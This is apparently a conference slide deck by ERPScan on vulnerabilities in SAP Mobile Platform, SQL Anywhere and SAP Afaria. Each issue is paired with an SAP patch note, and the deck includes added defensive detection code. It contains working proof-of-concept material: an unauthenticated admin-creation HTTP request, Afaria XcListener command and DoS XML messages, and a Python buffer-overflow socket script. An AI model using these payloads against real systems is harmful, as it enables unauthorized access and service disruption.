Attacking SAP Mobile


Invest in security to secure investments

Attacking SAP Mobile

Dmitry Chastukhin, ERPScan

About ERPScan

• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)

SAP Mobile Platform

What is it?

SMP architecture

Supported platforms

Objective-C, .NET

SMP protocols

Protocol          SUP 2.1.3   SUP 2.2   SMP 2.3   SMP 3.0
SMP Messaging     x           x         x         x
SMP Replication   x           x         x         x
HTTP REST API                 x         x         x
SAP Agentry                             x         x

SMP services

• SAP Control Center
• SAP SQL Anywhere services
• SAP Mobile Server

SAP Control Center (Portal)

• Working process: sccservice.exe
• Open ports:
  – 2100 (Messaging service)
  – 8282/8283 (Portal)
  – 9999 (RMI)

SQL Anywhere

SAP Mobile Server services

• MobiLink
• AdminWebServices
• MlsrvWrapper
• InfoboxMultiplexer
• OBMO
• JMSBridge

SAP Mobile Server (MobiLink)

AdminWebServices

• Uses Cassini Web Server 1.0
• Listens on the local port 5100

SAP Mobile Platform vulnerabilities

Decrypting the SAP Mobile Platform GIOP protocol

• GIOP (General Inter-ORB Protocol) is the abstract protocol by which object request brokers (ORBs) communicate
• Uses mlsrv16.exe (MobiLink), port 2000

XXE in the SAP Mobile Platform portal page…

• Portal URL: https://IP_ADDR:8283/scc
• web.xml and services-config.xml

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml

<servlet-mapping>
  <servlet-name>MessageBrokerServlet</servlet-name>
  <url-pattern>/messagebroker/*</url-pattern>
</servlet-mapping>

…XXE…

C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml

<channel-definition id="scc-http" class="mx.messaging.channels.HTTPChannel">
  <endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"
            class="flex.messaging.endpoints.HTTPEndpoint" />
</channel-definition>

Message broker endpoints:

1. /scc/messagebroker/amfpolling
2. /scc/messagebroker/amfsecurepolling
3. /scc/messagebroker/http
4. /scc/messagebroker/httpsecure
5. /scc/messagebroker/amflongpolling

…XXE

Read file with XXE

C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties

sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d

Decrypt sup.imo.upa

Prevention

• Install SAP Security Note 2125358: SAP Mobile Platform XXE vulnerability
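As an added example (not code from the deck, from SAP or from the Flex message broker), a request-body check that a reverse proxy or the portal front end could apply before any XML reaches a parser: it flags a DOCTYPE, an external entity declaration and a file or URL reference, and refuses such bodies outright. The two sample request bodies are constructed for the test; the vendor fix remains Security Note 2125358.

```python
import re
import xml.etree.ElementTree as ET

# A message-broker request carrying plain XML never needs a DTD, so a DOCTYPE alone is
# suspicious; an ENTITY declared with SYSTEM or PUBLIC is the classic XXE shape.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.I)
ENTITY_RE = re.compile(rb"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.I)
FILE_REF_RE = re.compile(rb"(file|jar|netdoc|gopher|ftp|https?):", re.I)

def xxe_findings(body: bytes) -> list:
    """Return reasons this request body looks like an XXE attempt (empty list = clean)."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("DOCTYPE declaration in request body")
    m = ENTITY_RE.search(body)
    if m:
        kind = "parameter" if m.group(1) else "general"
        findings.append(f"external {kind} entity declared via {m.group(2).decode().upper()}")
        if FILE_REF_RE.search(body[m.end():]):
            findings.append("entity resolves to a local file or a remote URL")
    return findings

def parse_request_xml(body: bytes) -> ET.Element:
    """Refuse flagged bodies before they reach any XML parser; otherwise parse normally."""
    findings = xxe_findings(body)
    if findings:
        raise ValueError("; ".join(findings))
    return ET.fromstring(body)

# Constructed samples, not traffic captured from a real SAP Control Center.
BENIGN = b"<request><op>listServers</op></request>"
XXE_SAMPLE = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE request [<!ENTITY cfg SYSTEM "file:///C:/SAP/MobilePlatform/Servers/'
    b'UnwiredServer/Repository/Instance/com/sybase/sup/server/SUPServer/sup.properties">]>\n'
    b"<request><op>&cfg;</op></request>"
)

if __name__ == "__main__":
    for sample in (BENIGN, XXE_SAMPLE):
        print(xxe_findings(sample) or "clean")
```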

SAP Mobile Platform: unauthenticated access to other servlets

• "Architecture and program vulnerabilities in SAP's J2EE engine" (BlackHat USA 2011)
• web.xml files revealed hidden methods to:
  – Read and generate logs
  – Deploy and install JAR packages

AdminWebService

POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: length

strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100
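One way to spot the AddAdminUser exposure in web-server access logs, as an added example that is neither the deck's nor SAP's code: it reads W3C-style log lines (constructed here, with an assumed field order) and raises an alert for every successful call to Admin.asmx/AddAdminUser made without an authenticated user or from a client that is not loopback.

```python
import ipaddress
from typing import List, Tuple

# Constructed log lines in a W3C-style layout (date time c-ip cs-method cs-uri-stem
# cs-username sc-status); they are not from a real Mobile Server.
SAMPLE_LOG = """\
2015-03-02 09:12:01 127.0.0.1 GET /MobileOffice/Admin.asmx admin 200
2015-03-02 09:12:07 10.20.30.40 POST /MobileOffice/Admin.asmx/AddAdminUser - 200
2015-03-02 09:12:09 127.0.0.1 POST /MobileOffice/Admin.asmx/AddAdminUser - 200
2015-03-02 09:13:15 10.20.30.41 GET /MobileOffice/Admin.asmx admin 200
"""

# The deck shows AddAdminUser accepting a new administrator with no credentials, so
# every successful call to it is worth an alert; extend the tuple for other methods.
SENSITIVE_METHODS = ("/MobileOffice/Admin.asmx/AddAdminUser",)

def audit_admin_calls(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, uri, reason) for each successful request to a sensitive method."""
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # header or blank line in the constructed layout
        _date, _time, client_ip, _method, uri, username, status = fields
        if not uri.startswith(SENSITIVE_METHODS) or status != "200":
            continue
        reasons = []
        if username == "-":
            reasons.append("no authenticated user")
        if not ipaddress.ip_address(client_ip).is_loopback:
            reasons.append("client is not loopback")
        alerts.append((client_ip, uri, "; ".join(reasons) or "sensitive method invoked"))
    return alerts

if __name__ == "__main__":
    for ip, uri, why in audit_admin_calls(SAMPLE_LOG):
        print(f"{ip} {uri}: {why}")
```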

SAP SQL Anywhere BoF/Code Execution

• CVE-2008-0912: the MobiLink server is affected by a heap overflow that occurs while handling strings such as username, version, and remote ID (all pre-auth) that are longer than 128 bytes
• CVE-2014-9264: a stack-based buffer overflow in the .NET Data Provider in SAP SQL Anywhere allows remote attackers to execute arbitrary code via a crafted column alias

First PSH request

SQL Anywhere DoS

Prevention

• Install SAP Security Note 2108161: Denial of service in SAP SQL Anywhere

SAP EMR Unwired SQL injection

• CVE-2013-7096 (CVSS 7.5)
• AndroidManifest.xml:

<provider
    android:name=".providers.ModiDataDbProvider"
    android:authorities="com.sap.mobi.docsprovider" />

Content URIs:

1. content://com.sap.mobi.docsprovider/documents/offline_cat
2. content://com.sap.mobi.docsprovider/documents/offline/
3. content://com.sap.mobi.docsprovider/documents/sample
4. content://com.sap.mobi.docsprovider/documents/online
5. content://com.sap.mobi.docsprovider/documents/offline_auth
6. content://com.sap.mobi.docsprovider/documents/offline
7. content://com.sap.mobi.docsprovider/documents/online_auth
8. content://com.sap.mobi.docsprovider/documents/sample/
9. content://com.sap.mobi.docsprovider/documents/online_cat

Prevention

• Install SAP Security Note 1864518: Security Improvements for MOB-APP-EMR-AND

SAP Afaria

• MDM solution
  – Version 7.0 SP5: released August 2014 (as SAP Afaria SP5)
  – Version 7.0 SP4: released December 2013 (as SAP Afaria SP4)
  – Version 7.0 SP2: released December 2012 (as SAP Afaria SP2)
  – Version 7.0: released April 2012 (as SAP Afaria)
  – Version 6.6: released September 2010
  – Version 6.5: released November 2009
  – Version 6.0: released December 2008
  – Version 5.0: released November 2003
  – Version 4.0: released June 2000 (as Afaria)
  – Version 3.5: released May 2000 (as Afaria for Handhelds)
  – Version 3.0: released October 1999
  – Version 2.0: released February 1999 (as CONNECT:Manage)
  – Version 1.2: released October 1997 (as RemoteWare Express)
  – Version 1.0: released February 1997 (as SessionXpress)

How it works

• Provide and enroll devices in management
• Define device settings
• Secure devices and data
• Collect inventory
• Distribute software
• Collect device activity data for managing expenses

Enrollment policy

Configuration policy

Application policy

Device information

Communication

SAP Afaria vulnerabilities

Good news

Missing authorization

• Command value: Run Channel or Test
• The XML request must start with 4 spaces
• PoC:

<AfariaNotify version="1.0.0">
  <Message type="Command" value="Run Channel">
    <Client name="AFARIA70PT">
    <Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">
      <Transmitter address="172.16.2.67:4444\asd">
        <Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\df"></Channel>
      </Transmitter>
    </Client>
  </Message>
</AfariaNotify>

Prevention

• Install SAP Security Note 2134905: Missing authorization check in XcListener

XcListener DoS

<AfariaNotify version="1.0.0">
  <Message type="Command" value="Run Channel">
    <Client name="LOCALHOST">
    <Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">
      <Transmitter address="172.16.2.67:4444\">
        <Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\(A*1491)"></Channel>
      </Transmitter>
    </Client>
  </Message>
</AfariaNotify>(A*3678)

XcListener BoF

• PoC:

import socket

HOST = 'hostname'  # Afaria server
PORT = 3005        # XcListener port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
poc = b'A' * 4098  # oversized payload that triggers the overflow
s.send(poc)
data = s.recv(10000)
s.close()
print('Received', data)

Prevention

• Install SAP Security Note 2132584: Buffer overflow in SAP Afaria 7 XcListener
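The three XcListener issues above (unauthorized Run Channel/Test commands, the padded-attribute DoS message, and the raw oversized payload) arrive on the same port in the same shape, so one inspection routine on that inbound traffic covers all of them. This is an added example, not code from the deck or from SAP Afaria: the size thresholds are assumptions, the sample messages are constructed (modelled on the deck's PoCs but made well-formed), and only the 4-space prefix rule and the port semantics come from the deck.

```python
import xml.etree.ElementTree as ET

# Thresholds are assumptions chosen for this example, not values from the deck or from SAP.
MAX_MESSAGE_BYTES = 4096
MAX_ATTR_CHARS = 256
PRIVILEGED_COMMANDS = {"Run Channel", "Test"}
ROOT_CLOSE = "</AfariaNotify>"

def inspect_xclistener_message(raw: bytes) -> list:
    """Return findings for one message received on the XcListener port (empty list = nothing odd)."""
    findings = []
    if len(raw) > MAX_MESSAGE_BYTES:
        findings.append(f"oversized message: {len(raw)} bytes")
    text = raw.decode("latin-1")
    if not text.startswith("    "):
        findings.append("missing the 4-space prefix the listener expects")
    body = text.strip()
    if not body.startswith("<AfariaNotify"):
        findings.append("payload is not an AfariaNotify document")
        return findings
    end = body.rfind(ROOT_CLOSE)
    stop = end + len(ROOT_CLOSE) if end != -1 else len(body)
    if body[stop:]:
        findings.append(f"{len(body) - stop} trailing bytes after the root element")
    try:
        root = ET.fromstring(body[:stop])
    except ET.ParseError as exc:
        findings.append(f"malformed XML: {exc}")
        return findings
    for el in root.iter():  # attribute padding is the DoS shape shown in the deck
        for name, value in el.attrib.items():
            if len(value) > MAX_ATTR_CHARS:
                findings.append(f"oversized attribute {el.tag}@{name}: {len(value)} chars")
    for msg in root.iter("Message"):  # Run Channel / Test must not be accepted unauthenticated
        if msg.get("type") == "Command" and msg.get("value") in PRIVILEGED_COMMANDS:
            findings.append(f"privileged command {msg.get('value')!r} without any authorization")
    return findings

def _notify(channel_name: str) -> str:
    """Constructed message modelled on the deck's PoC shape (made well-formed here)."""
    return ('    <AfariaNotify version="1.0.0"><Message type="Command" value="Run Channel">'
            '<Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">'
            '<Transmitter address="172.16.2.67:4444\\asd">'
            f'<Channel address="\\\\172.16.2.67:4444\\asd" name="{channel_name}"></Channel>'
            '</Transmitter></Client></Message></AfariaNotify>')

RUN_CHANNEL = _notify("\\\\172.16.2.67:4444\\df").encode()  # missing-authorization PoC shape
DOS_MESSAGE = (_notify("\\\\172.16.2.67:4444\\" + "A" * 1491) + "A" * 3678).encode()  # DoS shape
RAW_OVERFLOW = b"A" * 4098  # BoF PoC payload
```

Running the routine on the three constructed samples yields one finding for the plain Run Channel message, four for the DoS message and three for the raw payload.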

Each SAP landscape is unique and we pay close attention to the requirements of our customers and prospects. ERPScan development team constantly addresses these specific needs and is actively involved in product advancement. If you wish to know whether our scanner addresses a particular aspect, or simply have a feature wish list, please e-mail us. We will be glad to consider your suggestions for the future releases or monthly updates.

About

USA HQ: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301

EU HQ: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam

www.erpscan.com    [email protected]